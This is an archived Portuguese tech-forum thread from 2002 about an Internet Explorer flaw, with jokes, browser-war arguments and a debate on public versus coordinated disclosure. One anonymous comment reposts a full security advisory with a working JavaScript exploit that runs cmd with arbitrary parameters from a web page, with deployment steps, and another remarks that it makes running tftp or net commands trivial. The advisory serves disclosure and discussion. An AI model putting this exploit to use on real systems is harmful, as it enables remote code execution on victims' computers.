| Esta discussão foi arquivada. Não se pode acrescentar nenhum comentário. |
| | Será por isso que o site curriculum.com.br só aceita IE?
Agora um pouco mais a sério! CADA UM TEM O QUE MERECE!
Se um (l)user tiver o seu disco formatado, pode ser que da próxima vez pense duas vezes antes de usar o IE ou pior o Outlook!
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| |
|
| | Também existe Mozilla para Windoze!...
-=[ Rui Lameiro ]=- |
| |
| | coitado do leitao...
andou a picar os AC, agora eles estao sedentos...
ja' estou a ver uma data de AC a tentar saber que sites o leitao usa para lhe formatar o disco... 8)
la' vai ele ter de usar o mozilla ou o opera temporariamente
Higuita |
| |
| |
|
| | lolol
eu nao estou a dizer que eu te cracko, apenas estava
a aproveitar a situacao para gozar contigo e com os AC de sempre e as vossas interminaveis guerras, ja' que e' conhecido que usas o IE 8)
ja' agora, o raff e' um servidor geral da FEUP, nem sequer sei se a minha conta ainda funciona, quanto mais como ele esta' configurado
Higuita |
| |
| | | dude -- eu pus o ;-) por alguma razao.
"Monogamy is for guys that can't get pussy." --Steve-O.
|
| |
| | | Dude -- chil, ou perdeste o sentido de humor por completo ?
"Monogamy is for guys that can't get pussy." --Steve-O.
|
| |
| | Desculpem lá... mas que raio tem o Leitão a ver com este bug?
Porra! Já não se pode ter uma opinião diferente?
Jazzy |
| |
| | nao sabes reconhecer um comentario com piada?!
eu julgo que o leitao percebeu...
imagina os AC todos que odeiam o leitao a vasculhar o gildot e outros sites para ver que sites o leitao usa, _so'_ para poderem ataca-lo...
e o leitao a rir-se e a usar o opera temporariamente 8)
Higuita |
| |
| | Se calhar o problema é meu... mas nunca achei piada a gozarem com as outras pessoas, mas, mais uma vez, se calhar sou eu...
Jazzy |
| |
| | | Gozar ? Obrigado pelo apoio -- mas acredita que quem goza com estes gajos todos sou eu de cada vez que entro no carro! ;-)
"Monogamy is for guys that can't get pussy." --Steve-O.
|
| |
| | Também há essa prespectiva :-)
Jazzy |
| |
| | Ou então acedem do trabalho...
*grin*
-- |
| |
| | Um informático que acede do trabalho e não tem capacidade de mudar software no seu PC?
*sigh* Coitado...
|
| |
| | errr... estação de trabalho "padrão" (não é fixa).
Não tenho pass de administração, só tenho administração de servidores linux (e ainda bem!).
Quando ando com o portatil é outra história.
Por isso antes de mandares bocas pensa mais um bocadinho. Nem tudo é à balda como nos teus lados.
-- |
| |
| | Um "informático" que acede num sei de onde e não tem capacidade para configurar o raio do teclado? :-)
"No comments"
|
| |
| | LOL PS: eu tb uso explorer
|
| |
| | Os problemas do IE não são apenas de segurança. Quem quiser saber mais, siga o link da minha assinatura.
----
Lê aqui porque não deves utilizar IE, Outlook, Windows Media e Messenger. |
| |
| por Anonimo Cobarde em 19-11-02 22:00 GMT (#4)
|
| | o que vocês não percebem é que o IE uma ferramenta de administração remota! A MS anda muito avançada nestas coisas, tem uma grande visão. No futuro sempre que acederem à intranet da vossa empresa, serão automaticamente eliminados quaisquer mp3 e/ou software lúdico instalado no vosso PC
Eliminará também qualquer rasto de software opensource e qualquer partição não-ntfs/fat que tenham configurada!
Envia-vos o mail vindo fora de @empresa.pt para o bofh de forma a garantir o seu uso próprio restrito apenas a questões de trabalho.
O IE é no fim de contas uma ferramenta de gestão humana, não percebo como veem bugs em features!
|
| |
| |
| por Anonimo Cobarde em 19-11-02 22:22 GMT (#6)
|
| | |
| | | Quem classificou isto como informativo está numa destas duas categorias: - pretende manter o espírito irónico do poster
- anda a ler e a responder a demasiado spam
|
| |
| | Na volta achou que aquilo era a sério!
Mas um engraçado merecia!
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| | Qualquer Software lúdico que nã tenha a chancela da M$... :P
|
| |
| | grande ideia da M$...
agora o PC faz quase tudo... instala coisas sem pedir, actualiza-as automaticamente, apaga o que nos interessa, vigia o que fazemos, distribui os nossos ficheiros...e o melhor e' que e' muito colorido!!
agora so' falta ele comecar a jogar sozinho e fazer aqueles trabalhos burocraticos que nao gostamos 8)
realmente a M$ consegue andar sempre a frente do resto...
Higuita |
| |
| | | Be afraid, be very afraid. É esta frase que é ecoada na minha cabeça sempre que aparece um destes bugs monumentais, que permitem o controlo quase total de um computador de outrém. Pessoalmente uso o Mozilla, mas nem todas as pessoas têm a minha maneira de ver as coisas e nem têm tempo para "perder" a aprender as manhas de outros browsers senão as do IE. E muitas das pessoas que conheço que não o fazem são pessoas que programam todos os dias, que têm cargos importantes, que têm trabalhos e obrigações para cumprir. Claro que é importante descobrir bugs, que é importante melhorar o sofware (mesmo que da MS) mas dar a conhecer problemas deste género ao público em geral??? Permitir que por pura diversão alguém possa estragar dias (senão semanas...) de trabalho? Para mim quem disponibiliza estes exploits é mais um criminoso. Os bugs são para ser notificados às organizações competentes, e não ao público. É devido a questões como esta que o pessoal que apoia o Open Source vai continuar a ser equiparado aos meninos que andam a estragar a vida aos outros, ou pensam que não passa pela cabeça dos utilizadores que estes exploits sejam descobertas graças ao Mozilla e browsers afins? (cujo projecto é grandioso e benemérito mas que muito sofre, a meu ver, com tais situações)
KISS - Keep It Simple, Stupid! |
| |
| |
| | Sinceramente... Se esses bugs não forem publicados são ignorados pelas empresas a quem os cabe corrigir (o que não impede que entretanto alguém não os explore sem que os utilizadores saibam da sua existência)... a seguir vais dizer que a DMCA é excelente...
Isso é security through obscurity.
PS: Já agora e quanto ao pessoal que apoia o opensource fica sabendo que as distribuições se comprometeram a não divulgar os exploits durante um período de tempo após serem descobertos para permitir que já exista uma correcção aquando da divulgação (e isto porque a comunidade opensource corrige as falhas, não as atira para debaixo do tapete por tempo indefinido).
-- Carlos Rodrigues
|
| |
| | Acredito em tudo o que dizes, mas repara que os bugs /exploits deviam ser comunicados a organizações competentes. Por organizações competentes referia-me não só à empresa, mas a entidades reguladoras da qualidade, e outras cujo funcionamento esteja relacionado. O importante é que o grande público não tenha directo conhecimento do problema mas sim da solução.
KISS - Keep It Simple, Stupid! |
| |
| | E eu que pensaava que "O importante" era o bom funcionamento das aplicações/dispositivos/etc, e não o "grande público" ter "directo conhecimento" dos problemas.
Quanto ao que se _deve_ fazer com bugs e exploits, quem é a organização competente ? Quem introduziu o bug em primeiro lugar ? "Entidades reguladoras da qualidade" ? E porque é que _devem_ ser comunicados ? Vem na EULA ? "Todos os bugs encontrados serão propriedade de XPTO, Inc. ..."
-- pmsac.oO(Cogito sumere potum alterum) |
| |
| | Como normalmente "descartamos" os bugs nos programas, à medida que os vamos encontrando nos debugs (não é descartar, mas sim gozar um pouco com a situação): "Isso? Um bug?? nãããã... não é bug, é feature"
:)
HiTek DeVil |
| |
| | Áfricas? Bem, para pessoal que seja do norte, e que costume dizer que abaixo de coimbra é marrocos, acredito que pareça assim, mas morar em sintra, sempre ouvi dizer que pertenceria a Lisboa, que por seu lado, seria parte integrante de Portugal, e pasmem-se, por seu lado Lisboa seria a capital de Portugal :P Portanto, por dedução, como Portugal continental está totalmente "inserido" no espaço continental denotado como europeu, e Lisboa sendo parte integrante de Portugal, então serei europeu, e não africano... embora nem pela cor da pele seria Africano... por muito moreno que chegasse a ser, continuaria demasiado caucasiano para ser confundido com Afro-whatever (neste caso, afro-portugues... embora nao sei se existirá essa designação, mas como existe para afro-americano, faz-se de conta por momentos) :)
HiTek DeVil |
| |
| | Acho que o procedimento tomado pelas distribuições de linux é o mais correcto. Primeiro comunica-se o bug a uma organização competente (onde estão representadas as distribuições todas e outras partes interessadas - agora não me lembro qual é, input agradece-se) e passado um certo prazo comunica-se ao público em geral. Acho que a "ameaça" de divulgação do bug ao público em geral serve de incentivo (por acaso a comunidade opensource nem precisa muito) e ao mesmo tempo dá-se lhe uma oportunidade de se redimir (a quem produz o software em questão).
A moral da história é que o público tem o direito de saber com que linhas se cose.
-- Carlos Rodrigues
|
| |
| | Seguindo a visão mercantilista... Porque raio é que essas pessoas vão estar a servir de beta testers e auditores de segurança para as empresas... de graça?
Se alguém descobre um bug ou um exploit para um programa, é eticamente aconselhável dar uma oportunidade ao autor do programa de corrigir esse bug. Mas se o autor desse programa não for eticamente correcto ou então não ligar puto aos avisos de bugs/exploits porque é que não há-de ser divulgando o problema? Divulgando, ajuda os utilizadores desses programas a saber os riscos que tomam e a escolher melhor software no futuro.
É devido a questões como esta que o pessoal que apoia o Open Source vai continuar a ser equiparado aos meninos que andam a estragar a vida aos outros
Desculpa lá... mas o que tem o Open Source a ver com o assunto? Cracka-se o IE, alguem descobre um bug, alguem publica um exploit, e a culpa é dos "meninos do Open Source"?
pensam que não passa pela cabeça dos utilizadores que estes exploits sejam descobertas graças ao Mozilla e browsers afins
O Mozilla também cracka? É que ainda não descobri essa funcionalidade...
|
| |
| | | O Mozilla também cracka? É que ainda não descobri essa funcionalidade... Well, duh... vamos de noite! :) Com as configurações de IIS que por aí andam, basta um browser para teres uma linha de comandos remota :)
"Se vi mais além do que outro, é porque estava nos ombros de gigantes."
Sir Isaac Newton
|
| |
| por Anonimo Cobarde em 20-11-02 1:01 GMT (#31)
|
| | |
| | post esclarecedor, alguem modere isto para cima em vez de andar a moderar piadas para baixo!!
Higuita |
| |
| | | Só para avisar que pela minha experiência, ao contrário do que é dito no exploit, ele não funciona no Windows XP com o IE que vem por defeito. No entanto, no Windows 2000 funciona perfeitamente e torna-se trivial executar comandos como um tftp ou um net start/use/send.
"Se vi mais além do que outro, é porque estava nos ombros de gigantes."
Sir Isaac Newton
|
| |
| |
| por Anonimo Cobarde em 19-11-02 23:22 GMT (#18)
|
| Desculpa mas neste caso o IE vem mesmo "por defeito" :]
|
| |
| | correcçãozita:
não vem por defeito, vem por "característica"
------ EOFim. |
| |
| | De facto são tudo palavras que se aplicam ao IE, imperfeição, deformidade, vício, mancha, inconveniente! A "falta de alguma coisa" tambêm se aplica, se eu tiver um windows só com o IE, de certeza que vou sentir a falta do Mozilla!
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| por Anonimo Cobarde em 19-11-02 23:11 GMT (#15)
|
| Como de costume o fanatismo e a estupidez continua a ser rei e senhor aqui no gildot.
Ate parece que o IE é o unico browser cheio de buracos... Ate parece que o Opera 7 beta acabado de lancar nao tinha 2 buracoes triviais de exploit... E ate parece que o tao amado pelos fanaticos do open source chamado Mozilla ate tem buracos importantes patchados que nao sao anunciados em publico, apenas nos change logs para quem se der ao trabalho de os verificar.
Pois é fanatismo é como os burros com palas, so olham para a frente...
Btw nao sou o Leitao ou algum M$ lover... Gosto é pouco de fanatismos idioticos do tipo so ver OPEN SOURCE à frente.
Arranjem argumentos decentes para criticar as coisas... Vejam la se o tiro nao sai pela culatra com um exploit bem pior para o mozilla...
|
| |
| |
| | Por uma questao de principio, confio mais em software aberto que em software fechado. Ja muita tinta correu sobre as razoes por que acredito nisso.
Nao e como se a micromole tivesse tambem o monopolio de erros, lapsos e negligencia, basta ver os updates de qualquer distro para perceber que nao e assim.
Acho q a microsoft fez alguns programas que funcionam bem. Infelizmente, motivada por questoes de mercado e poder sobre os consumidores, fez outros programas que funcionam so suficientemente bem para poderem ser dados ou vendidos. Sao estrategias que resultam a curto e medio prazo, mas que trazem dores de cabeca a longo prazo.
--- "Esta voz!?!..." Cpt Francis Blake -- S.O.S. Meteoros |
| |
| | | Vejam la se o tiro nao sai pela culatra com um exploit bem pior para o mozilla... Nao precisas -- ja' ha' 6.
"Monogamy is for guys that can't get pussy." --Steve-O.
|
| |
| | Todos corrigidos.
"To underestimate one's self is as much a departure from truth as to exaggerate one's own powers"
- Sherlock Holmes |
| |
| | Bem... o tipo que nunca escreveu código com bugs que atire a primeira pedra!
Já quanto à atitude "isso não é um bug, é uma feature" muitos comentários pouco abonatórios se podem fazer...
Jazzy |
| |
| | E o facto de a Microsoft não ter o exclusivo dos bugs faz com que um bug desta importância deixe de ser notícia? E se calhar uma notícia que interessa mais a vocês (utilizadores do IE que têm feito estes comentários) do que a mim que não uso Windows e muito menos IE!
Antes de fazerem criticas por ter sido publicado o bug aqui e noutros sites, pensa como é que preferes saber da existência do bug, através de uma notícia no Gildot ou quando estiveres a navegar na net e alguêm te formatar o disco?
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| | | através de uma notícia no Gildot ou quando estiveres a navegar na net e alguêm te formatar o disco? Essa da formatacao do disco e' um bocado uma falacia -- qualquer utilizador que se prese nao vai correr o IE comunmente sobre uma conta priviligiada -- logo, nao estou a ver isto a ocorrer tao frequentemente como isso.
"Monogamy is for guys that can't get pussy." --Steve-O.
|
| |
| | Um utilizador do windows regra geral não faz ideia do que seja uma conta privilegiada e mesmo em NT/2000 usam o computador como "Adminitrator", já vi por ai alguem a dizer que no Win XP o bug não existe, se calhar porque está a tentar explorar o bug como utilizador não privilegiado!
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| | Informação tirada daqui
TESTED: Win2000 pro, XP, IE 6 (latest patches).
Agora que o bug é do conhecimento público, não me parece que eles continuem a insistir em não o corrigir, basta algum maluco se lembrar de perder tempo a fazer um worm que se instale em webservers a tentar explorar a falha a quem aceder ao webserver infectado, que seria uma autentica catástrofe!
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| | | Deixa-me cá defender o Opera :) Ate parece que o IE é o unico browser cheio de buracos... Ate parece que o Opera 7 beta acabado de lancar nao tinha 2 buracoes triviais de exploit...
Which part in Beta you don't understand?
"Se vi mais além do que outro, é porque estava nos ombros de gigantes."
Sir Isaac Newton
|
| |
| | Como de costume o fanatismo e a estupidez continua a ser rei e senhor aqui no gildot. Como de costume, o Gildot é salvo da sua estupidez militante pelas Luminosas Contribuições dos seus mais Corajosos Anónimos! Um grande bem-haja, oh Luz Radiosa que ilumina os nossos passos! Ficai! Derramai sobre as nossas mentes resequidas e sequiosas as férteis gotas da Vossa Preciosa Sabedoria! Ajudai-nos! Guiai-nos! Não nos deixeis sucumbir novamente ao breu da ignorância! São raros momentos como este, que na Vossa Infinita Generosidade nos ofereceis, que fazem a nossa pobre vida ter sentido! Aleluia, Salvador! A Vossa Preciosa Contribuição ficará para sempre gravada nos anais (oops..) do Gildot! Infelizmente, o Vosso Nome não pode ser nomeado, pois é desconhecido de nós, mortais, e nós na nossa fraqueza carecemos de um nome para nos referirmos às Coisas Maravilhosas. Mas a vossa mensagem traz-nos a Luz, e sereis portanto chamado de Portador da Luz. Ate parece que o IE é o unico browser cheio de buracos... Até parece que alguém disse isso... Estimado Portador da Luz, atentai na notícia que está publicada! Ela fala-nos, dir-se-ia que nos sussurra carinhosamente, que há um bug no IE. Será tal falso? Incómodo? Ofensivo? Não nos parece. De resto, a Vossa Iluminada Contribuição também não contesta aquelas afirmações. Diz antes, com Grande Sabedoria, que há outras coisas com erros. Ora, muito obrigado! Nós, pobres ignorantes e estúpidos, nunca nos teríamos apercebido disso sem o Vosso Atempado Alerta! Sagazmente vos haveis apercebido dessa nossa fraqueza, e oportunamente nos viestes oferecer guia! Podíeis ter-nos alertado para outros Grandes Problemas da Humanidade, como os buracos das estradas ou o colesterol dos cachorros-quentes, tudo problemas de que estupidamente não falamos ao referir o Bug do IE... É assim, uma notícia é uma notícia e nós, na nossa imensa fraqueza e estupidez, somos incapazes de publicar uma notícia e ao mesmo tempo publicar as outras todas. Grave falha nossa, mas (ai de nós!) não conseguimos melhor... E sim, é preciso alertar os nossos toldados leitores para que, quando uma notícia é publicada no Gildot, não fiquem a pensar que aquela é a única notíca que existe na Biosfera! Obrigado, ó Portador da Luz! Ate parece que o Opera 7 beta acabado de lancar nao tinha 2 buracoes triviais de exploit... E ate parece que o tao amado pelos fanaticos do open source chamado Mozilla ate tem buracos importantes patchados que nao sao anunciados em publico, apenas nos change logs para quem se der ao trabalho de os verificar. Até parece que no Gildot não se publicam notícias de defeitos de software open source. A mim, vesgo e iludido, até me tinha parecido que ante s de ontem apareceu uma... mas enganei-me, decerto. Bem haja, Ó Portador da Luz! Pois é fanatismo é como os burros com palas, so olham para a frente... Btw nao sou o Leitao ou algum M$ lover... Gosto é pouco de fanatismos idioticos do tipo so ver OPEN SOURCE à frente. Arranjem argumentos decentes para criticar as coisas... Vejam la se o tiro nao sai pela culatra com um exploit bem pior para o mozilla... Obrigado, Ó Portador da Luz, pelos argumentos decentes que arranjasteis para criticar os míseros farrapos de texto que desleixadamente publicámos neste contentor de refugo a que ousamos chamar Gildot. A Luz que nos mostrais é pura! É brilhante como o mais brilhante laser, é Recta como o mais coerente laser! Não se dispersa como o mais Concentrado laser, e como o mais Uniforme laser aponta para uma única direcção! Podemos finalmente deitar fora as nossas velhas e gastas palas de burros! Como o laser, a luz que nos mostrais é muito mais perfeita e, como convosco, também a nós nos há-de ajudar a não olhar para mais lado nenhum! Muito, muito obrigado, ó Portador da Luz! Contai connosco, Vossos servos, caso seja precisa ajuda para mudar as vossas pilhas!
|
| |
| | Este é sem dúvida alguma o melhor comentário que já li até hoje no Gildot, até as lágrimas me vieram ao olhos de tanto rir, em determinados momentos não pude mesmo conter algumas gargalhadas!
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| | Bem... eu sei que isto é redundante (venham daí essas moderações!), mesmo assim:
Clap, clap, clap!!!!! Fantástico!!! Suberbo!!! Magnífico!!!
Obrigado js por este momento delicioso. Muitos mais como este!
Jazzy |
| |
| | O "portador da luz" não merecia uma resposta com tal qualidade... mas nós agradecemos js. Sempre nos divertimos um bocado. :)
|
| |
| | Se não gostas de fanatismos podes começar a tentar acabar com o fanatismo... deixando tu de ser fanático!
1- A notícia não é sobre um bug no Opera 7, a que propósito é este para aqui chamado?
2- A notícia não é sobre um bug no Mozilla, porque que este tambêm está a ser para aqui chamado
3- Fantatismo e estupidez- Esta deveria ser a moderação ao teu comentário.
4- Arrangem argumentos decentes para criticar as coisas? Mas de quê que estás a falar? És assim tão idiota que não distingues uma critica de uma notícia sobre um bug?
5- Não me lembro de ter visto estes teus comentários idiotas em artigos como "OpenSource Backdoors", "Vulnerabilidades no BIND 4 e 8" ou outros do género? Guarda lá o teu fanatismo pelos produtos da Microsoft e volta lá para o teu buraco!
If you don't have time to do it right, where are you going to find the time to do it over? |
| |
| por Anonimo Cobarde em 20-11-02 0:04 GMT (#25)
|
| - Sandblad advisory #10 -
----------------------------------------------------------------
Title: "How to execute programs with parameters in IE"
Date: [2002-11-06]
Software: Internet Explorer (webbrowser control)
Vendor: http://www.microsoft.com/
Impact: Javascr1pt in "Internet zone" may
execute programs with parameters _ _
o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
TABLE OF CONTENTS:
==================
Introduction ................................................. 1
Vendor status ................................................ 2
Details ...................................................... 3
Exploit ...................................................... 4
Disclaimer ................................................... 5
Feedback ..................................................... 6
(1) INTRODUCTION:
=================
By default all internet contents such as homepages are placed in the
"Internet zone". Local content viewed in IE runs in the "Local computer
zone" with less restrictions.
In the past we have seen many vulnerabilities where scr1pt in the
"Internet zone" could access the "Local computer zone". The scr1pt could
do actions like:
- Read local files if the exact path is known and file can be opened by
IE.
- Execute local programs (exact path required) WITHOUT parameters using
the codebase attack.
It will be shown in this document how scr1pt in the "Local computer zone"
can actually be designed to run arbitrary programs WITH parameters (exact
path not needed). The technique used may open up far more dangerous
attacks than seen before.
(2) VENDOR STATUS:
==================
Microsoft was initially contacted 2002-10-04. After several mail
exchanges, their final response were that the technique used to run
programs with parameters from the "Local computer zone" was no security
vulnerability. A fix should instead be applied for all possibilities for
content in the "Internet zone" to access the "Local computer zone".
(3) DETAILS:
============
Javascr1pt can use the showHelp command to do one of the following two
operations:
1. Open a local compiled help file (.chm) in a separate winhelp window.
2. Open an url (must begin with http://) in a separate winhelp window.
SCR1PT in window opened as (1) may use the shortcut command (activeX
control) to run programs with parameters, but (2) may not. Nothing
strange, normal security restrictions.
After some investigations I found a way to make (2) use the shortcut
command. The following must be done:
3. SCR1PT in (2) gets access to the "Local computer zone".
4. SCR1PT in (2) changes url to "mk:@MSITStore:C:" or similiar.
5. A local compiled help file must have been opened since IE was first
started. Any help file will do. For example showHelp("iexplore.chm").
In order to achieve (3) there are several nonpatched "cross site/zone
scr1pting" vulnerabilites to use. To achieve (4) a new window must be
created from (2). By using the "opener" object it is possible to keep
control of the winhelp window (2) even after the url is changed. (5) is
trivial to achieve and will not affect the winhelp window for (2), since
it is opened in a different window by default.
Before MS02-055 was released by Microsoft the above were a lot more easier
to perform. (3) and (4) could then be skipped.
(4) EXPLOIT:
============
The exploit uses a nonpatched "cross site/zone scr1pting" vulnerability
published by Liu Die Yu 2002-10-01 to Bugtraq:
http://online.securityfocus.com/archive/1/293692
It could also be possible to use one of the many "cross site/zone
scr1pting" vulnerabilities Greymagic found:
http://sec.greymagic.com/adv/gm012-ie/
Recently I reported a new "cross site/zone scr1pting" vulnerability to
Microsoft that could also be used. But since no patch is yet produced,
information about it will not be published.
In order for not having to put scr1pt in 3 separate files I have combined
them into one single file. The scr1pt will check for text after the # sign
in the url to determine what to perform (url's hash). If your computer is
heavily loaded, then the value of the setTimeout timer has to be
increased. The timer is needed because the "mk:@MSITStore:C:" url is not
set directly by IE.
INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCR1PT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST START
WITH HTTP://).
4. The scr1pt will open up a dos window and display a line of text, create
the file c:/vulnerable.txt (write permission required) and start winmine
(this excellent game must exist). The help window for IE will not be
closed.
TESTED:
Win2000 pro, XP, IE 6 (latest patches).
--------------------------- CUT HERE ---------------------------
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascr1pt:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascr1pt:document.write('')");
f("javascr1pt:c1.Click();c2.Click();");
close();
}
--------------------------- CUT HERE ---------------------------
(5) Disclaimer:
===============
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
(6) Feedback:
=============
Please send suggestions and comments to: _ _
sandblad@acc.umu.se o' \,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad, student in Engineering Physics and
Computing Science at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
|
| |
| |
| | Mas.... ohhh :( isso não funciona no Mozilla!!!
Raios partam a Microsoft, nunca segue o 'standard'.
|
| |
